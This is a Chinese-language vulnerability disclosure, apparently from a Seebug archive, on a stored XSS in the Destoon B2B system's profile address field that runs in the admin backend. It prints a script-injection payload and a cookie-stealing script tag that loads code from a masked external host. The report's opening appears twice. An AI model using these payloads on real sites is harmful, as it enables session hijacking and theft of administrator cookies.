### 简要描述: Destoon B2B网站管理系统存储xss,可打后台cookie ### 详细说明: 我们在修改资料的地方插入xss [<img src="https://images.seebug.org/upload/201510/1021411315c0a92591e49db9efe60e61956aa230.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1021411315c0a92591e49db9efe60e61956aa230.png) 查看源代码- - 发现没有做任何的过滤 ``` <td class="tr"><input type="text" size="40" name="post[address]" id="daddress" value="\"><script>alert(/xss/)</script>"/> <span id="ddaddress" class="f_red"></span></td> </tr> ``` 我们既闭合value值,又成功地插入了xss [<img src="https://images.seebug.org/upload/201510/102142036ae501ec469a4e932b12e6a2dd9fdef4.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/102142036ae501ec469a4e932b12e6a2dd9fdef4.png) 后台成功触发 [<img src="https://images.seebug.org/upload/201510/10214218a184b290d57e07c399d6106b5162df8a.png" alt="3.png" width="600"...
### 简要描述: Destoon B2B网站管理系统存储xss,可打后台cookie ### 详细说明: 我们在修改资料的地方插入xss [<img src="https://images.seebug.org/upload/201510/1021411315c0a92591e49db9efe60e61956aa230.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1021411315c0a92591e49db9efe60e61956aa230.png) 查看源代码- - 发现没有做任何的过滤 ``` <td class="tr"><input type="text" size="40" name="post[address]" id="daddress" value="\"><script>alert(/xss/)</script>"/> <span id="ddaddress" class="f_red"></span></td> </tr> ``` 我们既闭合value值,又成功地插入了xss [<img src="https://images.seebug.org/upload/201510/102142036ae501ec469a4e932b12e6a2dd9fdef4.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/102142036ae501ec469a4e932b12e6a2dd9fdef4.png) 后台成功触发 [<img src="https://images.seebug.org/upload/201510/10214218a184b290d57e07c399d6106b5162df8a.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/10214218a184b290d57e07c399d6106b5162df8a.png) 因此我们继续,插入盗取cookie的xss代码 /><script src=http://**.**.**.**/RyjbQz8></script> [<img src="https://images.seebug.org/upload/201510/102142320730b917747cea2ddf9ba42fcbc799b5.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/102142320730b917747cea2ddf9ba42fcbc799b5.png) 我们登录到后台查看,我们的xss平台已经收到管理的cookie了哈哈 [<img src="https://images.seebug.org/upload/201510/102143057723274dd523d46445acccd1b2083b65.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/102143057723274dd523d46445acccd1b2083b65.png) ### 漏洞证明: 如上- -